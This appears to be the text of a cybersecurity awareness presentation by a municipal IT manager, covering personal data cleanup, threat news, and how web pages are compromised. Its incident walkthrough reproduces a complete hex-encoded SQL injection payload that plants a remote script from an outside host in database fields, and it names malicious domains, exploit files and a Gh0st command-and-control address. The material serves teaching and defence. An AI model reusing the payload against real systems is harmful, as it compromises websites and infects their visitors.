US Power Co. Cyberattacked 10K Times a Month Finding comes

advertisement
Steven Narvaez
CCIO / ITSD Mgr. City of Deltona
East Central Florida District Director FLGISA
 30 years of IT experience
 Two time winner of the Florida Local
Government Information Systems Association
(FLGISA.org) Technology Achievement Award
Program under the category of "Most
Innovative Use of Technology Award".
 FLGISA.ORG: What you need to know!
 WE ROCK!!!
Do You Really Know Where Your
Personal Information Is?
 See what information about you is available online
 Check out Spokeo and Pipl
 Massive amounts of data compiled from a variety of
sources including public records and social networking
sites about individuals.
 Can be used by credit issuers, criminal profilers,
employers, and others for any number of purposes,
not necessarily intended by the data service
providers.
Clean up the data you can control
 Review your accounts
 Three options:
1.
2.
3.
remove the data
modify the privacy settings
request that the account be deleted. If you are going to
request that the account be deleted, be sure to first remove
all of the data.
 Be sure to confirm that the account is deleted versus
deactivated.
Request cleanup of data you
don¹t control
 Contact site owners.
 Can’t find owners?
 Look it up using the ³WHOIS² service for an administrative and
technical contact for the site.
 A “WHOIS” query can be done by visiting the website
http://whois.net/
 Opt out of data service providers.
Request cleanup of data you don¹t
control
 Data service providers provide lists of contact information
to individuals or companies that request it.
 They often charge a fee for this information.
 Data service providers allow individuals to opt out of
having their data published.
 Services are aggregators so the original source provider of
the information will also likely have to be contacted to
remove your information.
 The Privacy Rights Clearinghouse publishes the opt-out
URL for over 240 of these types of services.
 Use a professional service.
 Be aggressive about maintaining a cycle of checking your
public data and removing items which don¹t match your
current risk tolerance.
For More Information:
Please visit:
 Privacy Rights Clearinghouse Opt-Out Urls:
www.privacyrights.org/online-information-brokers-list
 ·
Google support page for removal of
data: http://support.google.com/webmasters/bin/answer.py?hl
=en&answer=164133&topic=1724262&ctx=topic
 ·
IT World Article, ³Rescue your Online
Reputation²: www.itworld.com/itmanagementstrategy/212115/seven-ways-rescue-your-onlinereputation?page=0,2
 ·
Times Article ³How to Fix (or Kill) Web Data About
You²: www.nytimes.com/2011/04/14/technology/personaltech/14
basics.html?_r=0
Threat is real AND it is EVOLVING ALL
THE TIME!
US Power Co. cyber attacked 10,000 times a month!
 Could foreign hackers take out America's electric grid? A
new congressional report says it's a very real threat, with
more than a dozen of nearly 100 electric utilities surveyed
reporting constant or frequent cyber attacks, Reuters
reports.
 One utility said it was battered by a staggering 10,000
attacks a month; another reported daily such activity that
is "automated and dynamic in nature, able to adapt to
what is discovered during its probing process."
China ISP takes internet for a ride
 Small Chinese ISP – IDC China Telecommunication briefly
hijacked the internet by sending out wrong routing data
 Re-transmitted wrong routing data by state-owned China
Telecommunications, affected service providers around the
world.
 The event even made it into the '2010 US-China Economic and
Security Review' commission report presented in November
of that year to US Congress
 For 18 minutes on April 8, China Telecom rerouted 15 percent
of the internet's traffic through Chinese servers, affecting US
government and military web sites.
 Was / Is China testing a cyber attack capability?
 China Telecom called the April traffic re-direction an
accident.
China at Heart of Sweeping Cyber
spying War on US
 The damage so far could range from $25 billion to $100
billion, or up to 0.5% of GDP government analysts report.
 Cyber spying is "just so widespread that it’s known to be a
national issue at this point," says an Obama administration
official.
 Russia, Israel, and France have also delved into electronic
espionage
 Chinese officials deny such hacking.
 The New York Times and Wall Street Journal are among
several newspapers to cite recent hacking, the Daily
Intelligencer notes.
McAfee's Oopsie
 McAfee goofs up!
 Issued a faulty anti-virus update
 The now-infamous McAfee DAT file 5958 which wreaked havoc on PCs of countless
McAfee customers.
 Caused malfunctions like the Microsoft 'Blue
Screen of Death'
 Created the effect of a denial-of-service.
HTTP:
A Criminal’s
Best Friend
Understanding the
Problem in Four Parts
1.
URL: Recipe for Disaster
2.
Web Browser Ecosystem Vulnerable
3.
Malware Defeats Anti-Virus Signatures
4.
Web Servers Vulnerable
The Web Page: A Security Primer
How does a Web Page Work?
1.
HTML: Web site “recipe.”
Initial HTML retrieval provides
“recipe". Browser then fetches
all objects listed in initial
HTML “recipe”.
2. Web Resources:
The actual ingredients.
Retrieved, per the HTML, from
any specified location(s)
Includes:
•
•
•
•
Images
Scripts
Executable objects (“plug-ins”)
Other web pages
BoingBoing.net: A popular blog
 URLs in browser: 1
 HTTP Gets: 162
 Images: 66
from 18 domains including
5 separate 1x1 pixel invisible
tracking images
 Scripts: 87 from 7
domains
 Cookies: 118 from
15 domains
 8 Flash objects from
4 domains
Recipe + Ingredients…Let’s cook!
 Web page HTML is
the recipe
 Code snippets are
web
site ingredients
 The browser will
fetch
each ingredient
 Each ingredient
initiates a HTTP
transaction
Understanding
the Problem in
Four Parts
1.
URL: Recipe for Disaster
2.
Web Browser Ecosystem Vulnerable
3.
Malware Defeats Anti-Virus Signatures
4.
Web Servers Vulnerable
Web Browser Ecosystem Vulnerable
 SANS Institute Top 20 Security Risks
http://www.sans.org/top20/#c1
 IE and Firefox vulnerable
 “…hundreds of vulnerabilities in ActiveX controls
installed by software vendors have been discovered.”
 Media Players & Browser Helper Objects (BHO)
 RealPlayer, iTunes, Flash, QuickTime, Windows Media
 Explosion of BHOs and third-party plug-ins
 Plug-ins are installed (semi) transparently by website(s).
Users unaware an at-risk helper object or plug-in is
installed … introducing more avenues for hackers to
exploit users visiting malicious web sites.
Understanding
the Problem in
Four Parts
1.
URL: Recipe for Disaster
2.
Web Browser Ecosystem Vulnerable
3.
Malware Defeats Anti-Virus Signatures
4.
Web Servers Vulnerable
Malware Defeats Anti-Virus
Signatures
 Criminals have developed tools to mutate malware to
deflect signature-based detection.
 At a DefCon hacking conference, teams of researchers
proved their success yet again.
 Seven viruses and two exploits, all well-known, were
mutated to defeat multiple anti-virus engines
 Winning time: 2 hours, 25 minutes
Attack Vector: Vulnerable Web
Servers
SANS Institute Top 20 Security Risks
http://www.sans.org/top20/#c1
“Web application vulnerabilities account for almost half the
total number of vulnerabilities being discovered in the past
year**. These vulnerabilities are being exploited widely to
convert trusted web sites into malicious servers serving
client-side exploits and phishing scams.”
** including open-source and custom-built applications
SQL Injection Attacks
 How does the attack work?
1.
Web servers that present dynamic web pages often talk to databases to
retrieve the data.
2.
Web servers and databases use a popular language called Structured
Query Language (SQL) to describe the data requested.
3.
SQL can also insert new data and update existing data.
4.
If a web server passes unvalidated input from fields on web forms to the
database, attackers can take advantage of hacks to issue their own SQL
commands.
5.
Those hacks can inject malicious code into the database…
6.
…and the web server will subsequently present this malicious code
from the database to unsuspecting users when they visit the website.
 The process renders a formally good website into a malicious one
without the knowledge of the site owner or the site’s visitors!
Real-World SQL Injection
HTTP Post made to thousands of web servers
2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007
6006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007
500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006
D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0
073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006
400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900
700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E0078007400790
0700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020
005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004
D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700
480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E
00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005
B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E00760065007200740028007600610072006300680
0610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D
0068007400740070003A002F002F0063002E007500630038003000310030002E0063006F006D002F0030002E006A0073003E003C002F007
300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D0020002000
5400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200
043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F004300410054
00450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));
EXEC(@S);–178|80040e14|Unclosed_quotation_mark_before_the_character_string_’G;DECLARE_@S_NVARCHAR(4000);
SET_@S=CAST(0×4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004
00043002000′. - 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248
SQL Injection Decoded

What that POST is attempting:

…exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+’
'<script src=http://c.uc8010.com/0.js></script>’
'')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE
Table_Cursor DECLARE @T varchar(255)…

Attack inserts script into text fields in database

<script src=http://?.uc8010.com/0.js></script>

Site owner unaware their site was hacked

Site visitors will fetch the malicious script

Script used to deliver any web attack
Hacked While
Browsing
Behind the Scenes
What’s Happening on BrookeSeidl.com
 brookeseidl.com registered at eNom 2002
 63.249.17.64 hosted at Seattle’s ZipCon with 52 other
domains
 Script injected onto web page – one extra ingredient!
What Does Tejary.net/h.js Do?
 Browser fetches h.js javascript from tejary.net
 Tejary.net registered 2003 at GoDaddy and hosted on
68.178.160.68 in Arizona
 Registered by Aljuraid, Mr Nassir A in Saudi Arabia
 Tejary.net/h.js calls two remote iframe objects
What Does said7.com Do?






Browser fetches /Bb/faq.htm from www.said7.com
Said7.com Registered 2006 at NAMESECURE.COM
Hosted on 74.52.143.60 at ThePlanet, Houston, TX
Calls web form from 51yes.com
Calls v3i9.cn/c.htm as iFrame
<script language="javascript"
src="http://count49.51yes.com/click.aspx?id=4949530
24&logo=11"></script> <iframe
src=http://www.v3i9.cn/c.htm width=100
height=0></iframe>
Exploit Resources Fetched from
v3i9.cn
It all starts with /c.htm loaded from tejary.net, said7.com
Real Player Exploit
 /ipp.htm – Real Player exploit CVE-2008-1309
 2/40 AV anti-virus vendors detect, calls real.html. Includes f#!kyoukaspersky
 /real.htm, /real.js – Real Player exploit CVE-2007-5601
MDAC (Microsoft Data Access Component) Exploit
 /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions
Flash Exploit
 /swfobject.js – detects flash version and selects according content
 /flash.htm – Flash exploit. 2/40 anti-virus vendors detect
 /igg.htm - ??? Called from /flash.htm for exploit?
What is Our Malware?
 After successful exploit,
malware installed from v3i9.cn
 ce.exe = Gh0st malware
Keylogging, web cam
monitoring
Persistent connection to China:
58.253.68.68 vobe.3322.org
Anti-Virus Won’t Protect us
 Ce.exe analyzed
on Virus Total
31% detection on days
1, 2
48% detection on day
3
 21% detection for
SMS.exe
Protection - Prevention
 “The cost of protecting ourselves against cybercrime can
far exceed the cost of the threat itself … [therefore] we
should spend less in anticipation of cybercrime and more
on catching the perpetrators.”
 “We distinguish carefully between traditional crimes that
are now ‘cyber’ because they are conducted online (such
as tax and welfare fraud); transitional crimes whose modus
operandi has changed substantially as a result of the move
online (such as credit card fraud); new crimes that owe
their existence to the Internet; and what we might call
platform crimes such as the provision of botnets which
facilitate other crimes rather than being used to extract
money from victims directly.”
The Cost
 UK is spending ~$1 billion on efforts to protect
against or clean-up after a threat, including
$170 million on antivirus measures, but only
$15 million is being spent on law enforcement
to pursue cyber criminals.
 Shouldn’t we spend some time on stopping
the threat by apprehending the criminals?
Thank you for the opportunity to
have this chat!
Questions?
Fade to BLACK
Download